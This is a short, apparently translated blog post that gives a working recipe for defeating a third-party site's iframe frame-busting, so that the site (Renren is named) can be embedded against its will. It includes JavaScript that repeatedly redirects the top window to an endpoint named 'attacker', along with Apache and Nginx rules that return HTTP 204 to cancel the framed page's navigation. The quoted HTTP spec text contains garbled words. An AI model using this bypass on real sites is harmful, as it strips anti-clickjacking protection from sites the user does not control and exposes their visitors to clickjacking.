Attackers can bypass IFRAME busting.

Recently, due to project requirements, we need to embed a third-party website in the IFRAME webpage. For example, Renren. After the front-end engineer found this problem, I looked at it and found that it was because everyone made IFRAME busting.

Later I studied it. The better way is to solve this problem through HTTP 204.

Through the description, you will know what it is.

The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response may include new or updated metainformation in the form
Entity-headers, which if present shoshould be associated with the requested variant.

If the client is a user agent, it shocould not change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place
Causing a change to the user agent's active document view, although any new or updated metainformation shoshould be applied to the document currently in the user agent's active view.

Therefore, add this code to onbeforeunload on the webpage:

var preventBusting = 0;    window.onbeforeunload = function() { preventBusting++}    setInterval(function() {        if (preventBusting > 0) {            preventBusting -= 2;            window.top.location = 'http://yourwebserver/attacker';        }}, 0.5);

If Apache is used, add the following code to process 204 returned results. After alias_module,

 RedirectMatch 204 attacker(.*)$

Nginx is similar.

location = /attacker {            return 204;         }

Test passed.